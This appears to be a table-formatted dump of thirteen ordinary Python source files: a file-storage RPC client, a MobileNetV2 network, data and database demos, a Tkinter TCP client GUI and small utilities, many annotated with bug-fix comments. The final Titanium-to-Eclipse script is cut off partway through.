index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
23,400 | 03235ed81d5676b2069431c5fb4b4b6e0344dcc5 | import rpyc
import hashlib
import os
import sys
from metastore import ErrorResponse
import time
"""
A client is a program that interacts with SurfStore. It is used to create,
modify, read, and delete files. Your client will call the various file
modification/creation/deletion RPC calls. We will be testing your service with
our own client, and your client with instrumented versions of our service.
"""
class SurfStoreClient():
    """SurfStore client: talks to one MetadataStore and N BlockStores over rpyc.

    Config file format (one entry per line):
        line 0: "B: <number of block stores>"
        line 1: "metadata: <host>:<port>"
        line 2+: "block: <host>:<port>"  (one per block store)
    """

    BLOCK_SIZE = 4096  # bytes per content-addressed block

    def __init__(self, config):
        """Read the config file and open rpyc connections to all servers."""
        with open(config, 'r') as config_file:
            arr = config_file.readlines()
        # BUG FIX: was left as a string; store the count as an int.
        self.numBlockStores = int(arr[0].split(": ")[1])
        meta_host, meta_port = arr[1].split(": ")[1].split(":")
        self.metastore = rpyc.connect(meta_host, meta_port.strip())
        self.blockstore = []
        for line in arr[2:]:
            if line.strip() == "":  # skip blank / "\r\n" padding lines
                continue
            host, port = line.split(": ")[1].split(":")
            self.blockstore.append(rpyc.connect(host, port.strip()))

    def upload(self, filepath):
        """Read the local file, split it into 4096-byte blocks, and register it
        with the MetadataStore (storing any missing blocks first).

        BUG FIX: the original iterated the file object (which yields *lines*,
        not bytes), so "blocks" were 4096 lines instead of 4096 bytes. We now
        read fixed-size byte chunks.
        """
        blockstore_index = self.findServer()
        conn = self.metastore
        file_name = filepath.split("/")[-1]
        (v, hl, bl) = conn.root.read_file(file_name)
        upload_hl = []     # ordered list of block hashes
        upload_dict = {}   # hash -> raw block bytes
        with open(filepath, 'rb') as upload_file:
            while True:
                chunk = upload_file.read(self.BLOCK_SIZE)
                if not chunk:
                    break
                hash_value = hashlib.sha256(chunk).hexdigest()
                upload_hl.append(hash_value)
                upload_dict[hash_value] = chunk
        if not upload_hl:
            # Preserve original behaviour: an empty file is one empty block.
            hash_value = hashlib.sha256(b'').hexdigest()
            upload_hl.append(hash_value)
            upload_dict[hash_value] = b''
        try:
            conn.root.modify_file(file_name, v + 1, upload_hl, blockstore_index)
        except Exception as e:
            # error_type 2: stale version -> re-read version and retry.
            if getattr(e, 'error_type', None) == 2:
                return self.upload(filepath)
            # error_type 1: server is missing some blocks -> store them.
            if getattr(e, 'error_type', None) == 1:
                # NOTE(review): eval() on server-supplied data is unsafe in
                # general; kept because the MetadataStore protocol sends the
                # missing-block list as a Python literal — confirm.
                for value in eval(e.missing_blocks_list):
                    self.blockstore[blockstore_index].root.store_block(value, upload_dict[value])
                # BUG FIX: the original never retried modify_file after
                # storing the missing blocks, so the upload was never
                # actually committed to the MetadataStore.
                try:
                    conn.root.modify_file(file_name, v + 1, upload_hl, blockstore_index)
                except Exception:
                    return self.upload(filepath)
        print("OK")

    def delete(self, filename):
        """Ask the MetadataStore to delete a file; prints Not Found / OK."""
        conn = self.metastore
        (v, hl, blockstore_index) = conn.root.read_file(filename)
        if v == 0:  # never created
            print("Not Found")
            return -1
        try:
            conn.root.delete_file(filename, v + 1)
        except Exception as e:
            if getattr(e, 'error_type', None) == 2:
                # BUG FIX: return here — the original fell through and
                # printed "OK" a second time after the recursive retry.
                return self.delete(filename)
        print('OK')

    def download(self, filename, location):
        """Download a file from SurfStore and save it into the given folder."""
        (v, hl, blockstore_index) = self.metastore.root.read_file(filename)
        if len(hl) == 0:  # deleted or never created
            print("Not Found")
            return -1
        content = b''
        for h in hl:
            content += self.blockstore[blockstore_index].root.get_block(h)
        filepath = location + "/" + filename
        with open(filepath, 'wb') as f:
            f.write(content)
        print('OK')

    def findServer(self):
        """Return the index of the block store with the lowest ping RTT."""
        best_index = 0
        min_rtt = sys.maxsize
        for i, store in enumerate(self.blockstore):
            sent_at = time.time()
            store.ping()
            rtt = round(time.time() - sent_at, 4)
            if rtt < min_rtt:
                best_index = i
                min_rtt = rtt
        return best_index
if __name__ == '__main__':
    # CLI: client.py <config> <upload|download|delete> <args...>
    # BUG FIX: guard against missing arguments instead of raising IndexError.
    if len(sys.argv) < 3:
        print("Usage: client.py <config> <upload|download|delete> [args...]")
        sys.exit(1)
    client = SurfStoreClient(sys.argv[1])
    operation = sys.argv[2]
    if operation == 'upload':
        client.upload(sys.argv[3])
    elif operation == 'download':
        client.download(sys.argv[3], sys.argv[4])
    elif operation == 'delete':
        client.delete(sys.argv[3])
    else:
        print("Invalid operation")
|
23,401 | 96963609308efcb29dc16fe331068b7b9198c25b | import torch
import torch.nn as nn
import torch.nn.functional as F
class MobileNetV2(nn.Module):
    """MobileNetV2 for 32x32 inputs (CIFAR-style), expressed as a per-block
    configuration table instead of ~200 hand-unrolled lines.

    Attribute names (layers_<i>_conv1, layers_<i>_shortcut, ...) are kept
    byte-identical to the original so existing state dicts still load.

    BUG FIX: the original accepted ``num_classes`` but ignored it — the final
    linear layer was hard-coded to 100 outputs. ``num_classes`` is now wired
    through; its default is 100 so no-argument construction behaves exactly
    as before.
    """

    # Per inverted-residual block: (expanded_planes, out_planes, stride, shortcut)
    # shortcut: 'conv' = 1x1 projection + BN, 'seq' = identity (nn.Sequential()),
    #           None  = stride-2 block, no residual connection at all.
    _BLOCKS = [
        (32,  16,  1, 'conv'),   # 0
        (96,  24,  1, 'conv'),   # 1
        (144, 24,  1, 'seq'),    # 2
        (144, 32,  2, None),     # 3
        (192, 32,  1, 'seq'),    # 4
        (192, 32,  1, 'seq'),    # 5
        (192, 64,  2, None),     # 6
        (384, 64,  1, 'seq'),    # 7
        (384, 64,  1, 'seq'),    # 8
        (384, 64,  1, 'seq'),    # 9
        (384, 96,  1, 'conv'),   # 10
        (576, 96,  1, 'seq'),    # 11
        (576, 96,  1, 'seq'),    # 12
        (576, 160, 2, None),     # 13
        (960, 160, 1, 'seq'),    # 14
        (960, 160, 1, 'seq'),    # 15
        (960, 320, 1, 'conv'),   # 16
    ]

    def __init__(self, num_classes=100):
        super().__init__()
        # Stem: 3x3 conv, stride 1 (CIFAR variant keeps full resolution here).
        self.conv1 = nn.Conv2d(3, 32, kernel_size=3, stride=1, padding=1, bias=False)
        self.bn1 = nn.BatchNorm2d(32)
        in_planes = 32
        for i, (hidden, out_planes, stride, shortcut) in enumerate(self._BLOCKS):
            # Expansion 1x1 -> depthwise 3x3 -> projection 1x1 (no bias; BN follows).
            setattr(self, 'layers_%d_conv1' % i,
                    nn.Conv2d(in_planes, hidden, kernel_size=1, bias=False))
            setattr(self, 'layers_%d_bn1' % i, nn.BatchNorm2d(hidden))
            setattr(self, 'layers_%d_conv2' % i,
                    nn.Conv2d(hidden, hidden, kernel_size=3, stride=stride,
                              padding=1, groups=hidden, bias=False))
            setattr(self, 'layers_%d_bn2' % i, nn.BatchNorm2d(hidden))
            setattr(self, 'layers_%d_conv3' % i,
                    nn.Conv2d(hidden, out_planes, kernel_size=1, bias=False))
            setattr(self, 'layers_%d_bn3' % i, nn.BatchNorm2d(out_planes))
            if shortcut == 'conv':
                # Channel counts differ: project the input before adding.
                setattr(self, 'layers_%d_shortcut_0' % i,
                        nn.Conv2d(in_planes, out_planes, kernel_size=1, bias=False))
                setattr(self, 'layers_%d_shortcut_1' % i, nn.BatchNorm2d(out_planes))
            elif shortcut == 'seq':
                setattr(self, 'layers_%d_shortcut' % i, nn.Sequential())
            in_planes = out_planes
        # Head: 1x1 conv to 1280 channels, then the classifier.
        self.conv2 = nn.Conv2d(320, 1280, kernel_size=1, bias=False)
        self.bn2 = nn.BatchNorm2d(1280)
        self.linear = nn.Linear(in_features=1280, out_features=num_classes, bias=True)

    def forward(self, x):
        """Forward pass; expects (N, 3, 32, 32), returns (N, num_classes)."""
        x = F.relu(self.bn1(self.conv1(x)))
        for i, (_, _, _, shortcut) in enumerate(self._BLOCKS):
            out = F.relu(getattr(self, 'layers_%d_bn1' % i)(
                getattr(self, 'layers_%d_conv1' % i)(x)))
            out = F.relu(getattr(self, 'layers_%d_bn2' % i)(
                getattr(self, 'layers_%d_conv2' % i)(out)))
            out = getattr(self, 'layers_%d_bn3' % i)(
                getattr(self, 'layers_%d_conv3' % i)(out))
            if shortcut == 'conv':
                x = out + getattr(self, 'layers_%d_shortcut_1' % i)(
                    getattr(self, 'layers_%d_shortcut_0' % i)(x))
            elif shortcut == 'seq':
                x = out + getattr(self, 'layers_%d_shortcut' % i)(x)
            else:
                x = out  # stride-2 block: no residual
        x = F.relu(self.bn2(self.conv2(x)))
        # Spatial size is 4x4 by now (32 / 2^3), so this pools to 1x1.
        x = F.avg_pool2d(x, 4)
        x = x.view(x.size(0), -1)
        x = self.linear(x)
        return x
def mobilenetv2(**kwargs):
    """Factory helper: build a MobileNetV2, forwarding all keyword arguments."""
    model = MobileNetV2(**kwargs)
    return model
|
23,402 | a15b2386db70a758d7d5f9d3d7dc5777eb3d25e9 | import os
from urllib.request import urlopen
from xml.etree import ElementTree as ET
from io import StringIO
from sdg.schemas import SchemaInputBase
from sdg import helpers
class SchemaInputSdmxMsd(SchemaInputBase):
    """Input schema from SDMX MSD."""

    def load_schema(self):
        """Import the SDMX MSD into JSON Schema. Overrides parent."""
        properties = {}
        msd = self.parse_xml(self.schema_path)
        for concept in msd.findall('.//Concept'):
            key = self.alter_key(concept.attrib['id'])
            self.add_item_to_field_order(key)
            # Translation key is "<parent id>.<concept id>", or the concept id
            # doubled when the concept has no parent.
            parent_ref = concept.find('./Parent/Ref')
            if parent_ref is None:
                translation_key = '.'.join([key, key])
            else:
                translation_key = '.'.join([parent_ref.attrib['id'], key])
            field = {
                'type': ['string', 'null'],
                'title': concept.find('./Name').text,
                'description': concept.find('./Description').text,
                'translation_key': translation_key,
            }
            if self.scope is not None:
                field['scope'] = self.scope
            properties[key] = field
        self.schema = {
            "type": "object",
            "properties": properties
        }

    def parse_xml(self, location, strip_namespaces=True):
        """Parse XML via the shared SDMX helper.

        NOTE(review): ``strip_namespaces`` is accepted for signature
        compatibility but not forwarded to the helper — confirm intended.
        """
        return helpers.sdmx.parse_xml(location, request_params=self.request_params)

    def fetch_file(self, location):
        """Read a local path or URL via the shared file helper."""
        return helpers.files.read_file(location, request_params=self.request_params)
|
23,403 | 2dbad7828489743eb6425180b530e74478a35924 | import pandas as pd
import csv
from nltk.stem import PorterStemmer
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
import re
# Shared Porter stemmer instance used by stem_str().
ps = PorterStemmer()
# English stop-word set (requires the nltk "stopwords" corpus to be downloaded).
stop_words = set(stopwords.words('english'))
# Stems words to their root words and removes all characters that are not alphabets
def stem_str(str):
    """Lower-case, tokenize, and Porter-stem a string, dropping stop words,
    non-alphabetic tokens, and single-character tokens; tokens are joined
    with single spaces."""
    stems = [ps.stem(w) for w in word_tokenize(str.lower())
             if w not in stop_words and w.isalpha() and len(w) > 1]
    # Defensive pass: replace any non-letter characters with spaces, as the
    # original did, then trim the result.
    cleaned = re.sub("[^a-zA-Z]", " ", " ".join(stems))
    return cleaned.strip()
# Gets the count of most frequent words give a dataframe
def word_freq(df):
    """Return a DataFrame of word frequencies over the 'stemmed_sms' column,
    sorted most-frequent first (columns: "Unique Words", "Frequency")."""
    from collections import Counter  # local import: module top has no collections import
    counts = Counter()
    for index, row in df.iterrows():
        # Counter.update replaces the original manual if/else counting dict.
        counts.update(word_tokenize(row['stemmed_sms']))
    word_freq_df = pd.DataFrame(list(counts.items()),
                                columns=["Unique Words", 'Frequency'])
    word_freq_df = word_freq_df.sort_values(['Frequency'], ascending=False)
    return word_freq_df
if __name__ == '__main__':
    # Read the raw dataset via the csv library (first row is the header).
    filepath = 'C:\\Users\\Joash\\Desktop\\University Stuff\\4B uni stuff\\SYDE 522\\522 Project\\SMS_spam_or_ham\\spam'
    # BUG FIX: the file handle was never closed; use a context manager.
    with open(filepath + '.csv', "rt") as csvfile:
        reader = csv.reader(csvfile)
        data = [row for row in reader]
    data = data[1:]  # drop the header row
    df = pd.DataFrame(data, columns=['class', 'sms'])

    # Stemming and the removal of stop words via stem_str().
    df['stemmed_sms'] = df.loc[:, 'sms'].apply(lambda x: stem_str(str(x)))
    # Length columns: raw message vs cleaned message.
    df['len_original_test'] = df.loc[:, 'sms'].apply(lambda x: len(x))
    df['len_clean_text'] = df.loc[:, 'stemmed_sms'].apply(lambda x: len(x))
    # Write the stemmed data out to csv.
    df.to_csv(filepath + '_result.csv', index=False)

    # Everything from here on out is EDA.
    # BUG FIX: the "Top 10" prints below sliced [0:9], which shows only
    # 9 rows; use [0:10] for a true top 10.
    spam_df = df[df['class'] == 'spam']
    spam_word_freq = word_freq(spam_df)
    print("Top 10 most occuring spam unique words are:")
    print(spam_word_freq[0:10])

    ham_df = df[df['class'] == 'ham']
    ham_word_freq = word_freq(ham_df)
    print("Top 10 most occuring ham unique words are:")
    print(ham_word_freq[0:10])

    # BUG FIX: renamed the result variable so it no longer shadows the
    # word_freq() helper function.
    overall_word_freq = word_freq(df)
    print("Top 10 most occuring unique words are in the whole dataset are:")
    print(overall_word_freq[0:10])
    print("The total number of unique words are", len(overall_word_freq))

    # Class balance of the dataset.
    count_spam = df[df['class'] == 'spam']['class'].count()
    print()
    print('Count of spam class is', count_spam)
    count_ham = df[df['class'] == 'ham']['class'].count()
    print()
    print('Count of ham class is', count_ham)
|
23,404 | 5ccb6e5762711fcafc9245fb7f355cfed56c17d1 | import tensorflow as tf
# Minimal TensorFlow 1.x graph/session demo: multiply two variables.
a = tf.Variable(1) # declare a variable
b = tf.Variable(2)
c = tf.multiply(a ,b) # build the graph node that multiplies a and b
init = tf.global_variables_initializer() # variables must be initialized before use (TF 1.x)
sess = tf.Session() # create a Session to execute the graph (TF 1.x API)
sess.run(init) # run the initializer first,
print(sess.run(c)) # then evaluate c (prints 2)
|
23,405 | 3e3963f5b525291c5a19f6b294dc1dcf553f9387 | import sqlite3
# Creates or opens connection to db file
conn = sqlite3.connect('first_db.sqlite')
conn.row_factory = sqlite3.Row  # rows now support lookup by column name as well as index

# Create a table.
# BUG FIX: column type was misspelled "interger"; SQLite tolerated it only
# via its loose type-affinity rules.
conn.execute('create table if not exists phones (brand text, version integer)')

# Add some data.
# NOTE(review): these inserts run on every execution, so repeated runs
# accumulate duplicate rows — confirm that is acceptable for this demo.
conn.execute('insert into phones values ("Android", 5)')
conn.execute('insert into phones values ("iPhone", 6)')
conn.commit()  # Finalize updates

# Rows print as sqlite3.Row objects.
for row in conn.execute('select * from phones'):
    print(row)

# Access columns by position...
for row in conn.execute('select * from phones'):
    print(row[0])  # The brand
    print(row[1])  # The version

# (Removed a redundant commit here: the reads above made no changes.)

# ...or by name, thanks to the Row factory.
for row in conn.execute('select * from phones'):
    print(row['brand'])
    print(row['version'])

conn.close()  # And close connection.
|
23,406 | 41a986ee3a9a23220e6673f4178cedb8de89bf37 | from chain_map import linear_extension
from cells import Simplex, CubicalCell
@linear_extension
def AW(cell):
    """Apply the Alexander-Whitney diagonal approximation to a single cell.

    Extended linearly over chains by the ``linear_extension`` decorator.
    Raises NotImplementedError for unsupported cell types.
    """
    # Both supported types expose the same AW() method, so the original's
    # duplicated isinstance branches collapse into one check.
    if isinstance(cell, (Simplex, CubicalCell)):
        return cell.AW()
    raise NotImplementedError('Alexander-Whitney diagonal approximation is only defined'
                              ' for simplices or cubical cells.')
if __name__ == '__main__':
    # Smoke test: print the AW diagonal of the standard 2-simplex.
    print(Simplex((0, 1, 2)).AW())
|
23,407 | 188b86a0ffe57767a4fa6645acdb6c949154a3ac | #!/usr/bin/env python3
import collections
def hamming2(s1, s2):
    """Calculate the Hamming distance between two bit strings"""
    assert len(s1) == len(s2)
    distance = 0
    for left, right in zip(s1, s2):
        if left != right:
            distance += 1
    return distance
def main():
    """Print every pair of IDs from in.txt that differ in exactly one position.

    (Each line is compared against every line, so each match prints once per
    direction; the inner break stops after a line's first partner.)
    """
    # BUG FIX: removed the unused `twos`/`threes` counters left over from an
    # earlier part of the puzzle.
    with open('in.txt', 'r') as f:
        data = f.read().split()
    for line in data:
        for line2 in data:
            if hamming2(line, line2) == 1:
                print(line, line2)
                break

if __name__ == '__main__':
    main()
23,408 | 126cf8559414331c1804477eace1b34fe3f5fe26 | import tkinter as Tk
import socket
import threading
import json
class ClientGui:
    """Widget layer of the TCP client: a Connect toggle, server IP/port
    entries, and a read-only "QT7 Xpro Simulator" frame (slider + two
    buttons) that mirrors state received from the server.

    cmd_start / cmd_stop are callbacks fired when the Connect toggle is
    switched on / off.
    """
    def __init__(self, master, cmd_start, cmd_stop):
        # Connect toggle state (1 = pressed) and server address fields.
        self.start_button_val = Tk.IntVar()
        self.serverIP = Tk.StringVar()
        self.serverPort = Tk.StringVar()
        # Defaults shown in the entries at startup.
        self.serverIP.set("192.168.0.34")
        self.serverPort.set("5555")
        # indicatoron=False renders the checkbutton as a push button.
        self.start_button = Tk.Checkbutton(master, text="Connect to\nServer", command=lambda: self.manage_start_button(cmd_start, cmd_stop), font="Arial 12", variable=self.start_button_val, indicatoron=False, width=10, height=3)
        self.IP_label_name = Tk.Label(master, text="TCP Server IP", width=15, font="Arial 12")
        vcmd1 = master.register(self.validateIP) # we have to wrap the command
        # %S = text being inserted/deleted, %P = entry value if the edit is allowed.
        self.IP_entry_value = Tk.Entry(master, width=15, font="Arial 12", validate="key", validatecommand=(vcmd1, '%S','%P'), textvariable=self.serverIP)
        self.Port_label_name = Tk.Label(master, text="TCP Server Port", width=15, font="Arial 12")
        vcmd2 = master.register(self.validatePort) # we have to wrap the command
        self.Port_entry_value = Tk.Entry(master, width=10, font="Arial 12", validate="key", validatecommand=(vcmd2,'%S', '%P'), textvariable=self.serverPort)
        self.qtFrame = Tk.LabelFrame(master, text="QT7 Xpro Simulator", width=400, height=400, bd=1, relief="ridge")
        # Simulator widgets start disabled: they only display remote state.
        self.sliderVal = Tk.DoubleVar()
        self.sliderWid = Tk.Scale(self.qtFrame, variable = self.sliderVal, font="Arial 15", from_ = 0, to = 255, orient = Tk.HORIZONTAL,
                                  sliderlength = 30, width = 57, length = 300, state = "disabled", showvalue = 0)
        self.sliderBt1Val = Tk.IntVar()
        self.sliderBt1 = Tk.Checkbutton(self.qtFrame, text="1", font="Arial 15", indicatoron=False, width=5, height=2, variable=self.sliderBt1Val, state = "disabled")
        self.sliderBt2Val = Tk.IntVar()
        self.sliderBt2 = Tk.Checkbutton(self.qtFrame, text="2", font="Arial 15", indicatoron=False, width=5, height=2, variable=self.sliderBt2Val, state = "disabled")
        # Grid layout: address row(s) on top, simulator frame below.
        self.IP_label_name.grid(row=1, column=0, padx=5, pady=5, sticky="e")
        self.IP_entry_value.grid(row=1, column=1, padx=5, pady=5)
        self.Port_label_name.grid(row=2, column=0, padx=5, pady=5, sticky="e")
        self.Port_entry_value.grid(row=2, column=1, padx=5, pady=5, sticky="w")
        self.start_button.grid(row=1, column=2, rowspan=2, columnspan=1, padx=5, pady=5)
        self.qtFrame.grid(row=3, column=0,rowspan=5, columnspan=5, padx=5, pady=5)
        self.sliderWid.grid(row=5, column=1, rowspan=2, columnspan=2, padx=5, pady=5)
        self.sliderBt1.grid(row=4, column=0, rowspan=1, columnspan=1, padx=5, pady=5)
        self.sliderBt2.grid(row=5, column=0, rowspan=1, columnspan=1, padx=5, pady=5)

    def greet_func(self):
        """Switch the UI into the 'connected' state (lock the address fields)."""
        self.start_button.config(text="Disconnect")
        self.IP_entry_value.config(state="disabled")
        self.Port_entry_value.config(state="disabled")

    def bye_func(self):
        """Reset the UI to the 'disconnected' state and un-press the toggle."""
        self.start_button.config(text="Connect to\nServer")
        self.start_button_val.set(0)
        self.IP_entry_value.config(state="normal")
        self.Port_entry_value.config(state="normal")

    def submit_cmd(self):
        """Re-enable the connect controls.

        NOTE(review): appears unused in this module — confirm before removing.
        """
        self.start_button.config(state="normal")
        self.IP_entry_value.config(state="normal")
        self.Port_entry_value.config(state="normal")

    def validateIP(self, new_text, full_text):
        """Per-keystroke Entry validator for the IP field.

        Accepts digits or a '.' insertion, up to 15 characters and at most
        3 dots.  NOTE(review): octet ranges are not checked, and multi-char
        pastes containing '.' are rejected — presumed acceptable for a demo.
        """
        if not full_text:
            return True
        if not new_text:  # deletion — always allowed
            return True
        if (new_text.isdigit() or new_text == ".") and len(full_text) < 16 and full_text.count(".") < 4:
            return True
        return False

    def validatePort(self, new_text, full_text):
        """Per-keystroke Entry validator for the port field: digits only,
        at most 5 characters."""
        if not full_text:
            return True
        if not new_text:  # deletion — always allowed
            return True
        if new_text.isdigit() and len(full_text) < 6:
            return True
        return False

    def manage_start_button(self, cmd_start, cmd_stop):
        """Dispatch the Connect toggle: start on press, reset UI and stop on release."""
        if 1 == self.start_button_val.get():
            cmd_start()
        else:
            self.start_button.config(text="Connect to\nServer")
            self.IP_entry_value.config(state="normal")
            self.Port_entry_value.config(state="normal")
            cmd_stop()
class ThreadedClient:
def __init__(self, master):
self.master = master
self.isClientRunning = False
self.clientSocket = None
self.clientFrame = Tk.Frame(master, width=50, height=100, bd=1, relief="sunken")
self.clientFrame.grid(padx=5, pady=5, sticky="ew")
self.guiClient = ClientGui(self.clientFrame, self.clientStartCmd, self.clientStopCmd)
def clientStartCmd(self):
if (False == self.isClientRunning):
if self.guiClient.serverIP.get() != "" and self.guiClient.serverPort.get() != "":
pass
self.clientThread = threading.Thread(target=self.client_thread, args = [])
self.clientThread.setDaemon(1)
self.clientThread.start()
else:
print("client already running")
def clientStopCmd(self):
self.isClientRunning = False
def client_thread(self):
host = self.guiClient.serverIP.get()
port = int(self.guiClient.serverPort.get())
self.guiClient.start_button.config(text="Connecting...\nClick to cancel")
try:
self.clientSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.clientSocket.connect((host, port))
self.clientSocket.settimeout(1)
except socket.error as msg:
print("Error connecting to server: " + str(msg))
else:
self.isClientRunning = True
while True == self.isClientRunning:
try:
data = self.clientSocket.recv(1024)
except socket.timeout:
continue
except socket.error as msg:
print('disconnected', msg)
break
else:
if len(data):
#print("-- before parsing --")
#print(data.decode())
dict_str = data.decode()
dict_list = [e+"}" for e in dict_str.split("}") if e]
for dict in dict_list:
parsed_data = self.parse_recv_data(dict)
if parsed_data is not None:
#print("-- received --")
print(parsed_data)
if "data" in parsed_data:
self.guiClient.greet_func()
elif "Button1" in parsed_data:
if (parsed_data["Button1"] > 0):
self.guiClient.sliderBt1Val.set(1)
else:
self.guiClient.sliderBt1Val.set(0)
elif "Button2" in parsed_data:
if (parsed_data["Button2"] > 0):
self.guiClient.sliderBt2Val.set(1)
else:
self.guiClient.sliderBt2Val.set(0)
elif "Slider" in parsed_data:
self.guiClient.sliderVal.set(parsed_data["Slider"])
else:
print('disconnected')
break
self.isClientRunning = False
self.clientSocket.close()
print('connection lost')
self.guiClient.bye_func()
def parse_recv_data(self, rx_data):
    """Parse one JSON message received from the server.

    Returns the decoded object, or None when rx_data is not valid JSON
    (or not a decodable type).
    """
    try:
        convData = json.loads(rx_data)
    except (ValueError, TypeError):
        # json.JSONDecodeError is a ValueError subclass; TypeError covers
        # non-string input. The original bare 'except:' also swallowed
        # KeyboardInterrupt/SystemExit, hiding real problems.
        print("parsing error :invalid json data")
        return None
    else:
        return convData
if __name__ == '__main__':
    # Build the Tk root window, hand it to the threaded client application,
    # then enter the Tk event loop until the window is closed.
    root = Tk.Tk()
    root.title("PIC32MZ-W1 Curiosity Touch Demo")
    app = ThreadedClient(root)
    root.mainloop()
23,409 | 97cb2f642e166f2a14e54350e3248a47cae0f0e1 | """
점프 투 파이썬 06장 게시판 페이징 하기
만든이 : 김동현
만든 날짜 : 2020년 07월 13일 월요일
"""
def getTotalPage(n, m):
    """Return the number of pages needed to show n items at m items per page.

    Uses pure integer arithmetic: the original float-based ``int(n/m + 1)``
    can lose precision for very large n.
    """
    if n % m == 0:
        return n // m
    return n // m + 1
# Demo: page counts for several item totals at 10 items per page.
for total in (5, 15, 25, 30):
    print(getTotalPage(total, 10))
|
23,410 | c31e10e37000f50d035d35c4d57f1448ce97aedf | from .models import Testimonial
# Context processor that supplies dynamic testimonials to templates
def get_testimonials(request):
    """Return a template context holding three randomly ordered testimonials.

    NOTE(review): the original comment mentioned filtering for visible
    entries, but no filter is applied — confirm whether one was intended.
    """
    random_picks = Testimonial.objects.all().order_by('?')[:3]
    return {'testimonials': random_picks}
|
23,411 | d8d7fc27b97ba6558b0ab9d19ef4d65c32b0ac35 | # Copyright (c) Chris Choy (chrischoy@ai.stanford.edu).
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
# Please cite "4D Spatio-Temporal ConvNets: Minkowski Convolutional Neural
# Networks", CVPR'19 (https://arxiv.org/abs/1904.08755) if you use any part
# of the code.
import torch

# Guard: compare numeric version components. The original compared version
# *strings*, which wrongly rejects e.g. "1.10.0" ("1.10" < "1.7" lexicographically).
TORCH_VERSION = tuple(int(p) for p in torch.__version__.split("+")[0].split(".")[:2])
assert TORCH_VERSION >= (1, 7), "Gradcheck requires pytorch 1.7 or higher"
from torch.types import _TensorOrTensors
from typing import Callable, Union, Optional
from torch.autograd.gradcheck import gradcheck as _gradcheck
def gradcheck(
    func: Callable[..., Union[_TensorOrTensors]], # See Note [VarArg of Tensors]
    inputs: _TensorOrTensors,
    eps: float = 1e-6,
    atol: float = 1e-5,
    rtol: float = 1e-3,
    raise_exception: bool = True,
    check_sparse_nnz: bool = False,
    nondet_tol: float = 0.0,
    check_undefined_grad: bool = True,
    check_grad_dtypes: bool = False,
) -> bool:
    """Numerically verify the gradients of a custom autograd Function.

    Despite the ``Callable`` annotation, ``func`` must be a
    ``torch.autograd.Function`` *class*: this wrapper calls ``func.apply``
    so the custom forward/backward pair is exercised.

    All keyword arguments are forwarded unchanged to
    ``torch.autograd.gradcheck``; see its documentation for their meaning.
    NOTE(review): ``check_sparse_nnz`` was removed from upstream gradcheck
    in newer PyTorch releases — confirm the supported torch version range.
    """
    return _gradcheck(
        lambda *x: func.apply(*x),
        inputs,
        eps=eps,
        atol=atol,
        rtol=rtol,
        raise_exception=raise_exception,
        check_sparse_nnz=check_sparse_nnz,
        nondet_tol=nondet_tol,
        check_undefined_grad=check_undefined_grad,
        check_grad_dtypes=check_grad_dtypes,
    )
|
23,412 | b42ce46dacf792a0ea681ef0fe8e6ec67c8537e1 | #!/usr/bin/env python
"""
* tidevtools 'ti_eclipsify' - Prepare a Titanium mobile 1.8.0+ project folder
* for importing into Eclipse.
*
* Copyright (c) 2010-2012 by Bill Dawson
* Licensed under the terms of the Apache Public License
* Please see the LICENSE included with this distribution for details.
* http://github.com/billdawson/tidevtools
*
* Just run this script at the top of a project folder.
* See ti_eclipsify.md for more details.
"""
import sys, os, shutil
# Contents for Eclipse/ADT required project files.

# project.properties template: Android API target plus references to the
# Titanium library projects inside the SDK source tree (paths are rewritten
# to real relative paths at the bottom of this script).
project_properties="""target=android-17
apk-configurations=
android.library.reference.1=../android/titanium
android.library.reference.2=../android/modules/accelerometer
android.library.reference.3=../android/modules/analytics
android.library.reference.4=../android/modules/android
android.library.reference.5=../android/modules/app
android.library.reference.6=../android/runtime/common
android.library.reference.7=../android/runtime/v8
android.library.reference.8=../android/modules/calendar
android.library.reference.9=../android/modules/contacts
android.library.reference.10=../android/modules/database
android.library.reference.11=../android/modules/geolocation
android.library.reference.12=../android/modules/filesystem
android.library.reference.13=../android/modules/gesture
android.library.reference.14=../android/modules/locale
android.library.reference.15=../android/modules/map
android.library.reference.16=../android/modules/media
android.library.reference.17=../android/modules/network
android.library.reference.18=../android/modules/platform
android.library.reference.19=../android/modules/ui
android.library.reference.20=../android/modules/utils
android.library.reference.21=../android/modules/xml
"""

# First half of the Eclipse .classpath file: source folders, the ADT
# containers, and the Titanium support jars. Per-module jar entries are
# spliced in between part1 and part2.
dot_classpath_part1="""<?xml version="1.0" encoding="UTF-8"?>
<classpath>
<classpathentry kind="src" path="src"/>
<classpathentry kind="src" path="gen"/>
<classpathentry kind="con" path="com.android.ide.eclipse.adt.ANDROID_FRAMEWORK"/>
<classpathentry exported="true" kind="con" path="com.android.ide.eclipse.adt.LIBRARIES"/>
<classpathentry kind="lib" path="/titanium/lib/commons-logging-1.1.1.jar"/>
<classpathentry kind="lib" path="/titanium/lib/ti-commons-codec-1.3.jar"/>
<classpathentry kind="lib" path="/titanium-dist/lib/kroll-apt.jar"/>
<classpathentry kind="lib" path="/titanium-xml/lib/jaxen-1.1.1.jar"/>
<classpathentry kind="lib" path="/titanium/lib/android-support-v4.jar"/>
<classpathentry kind="lib" path="/titanium/lib/thirdparty.jar"/>
"""

# Closing half of .classpath: output folder and document end.
dot_classpath_part2="""
<classpathentry kind="output" path="bin/classes"/>
</classpath>
"""

# Eclipse .project template; [PROJECT_NAME] is substituted with the app
# name read from tiapp.xml.
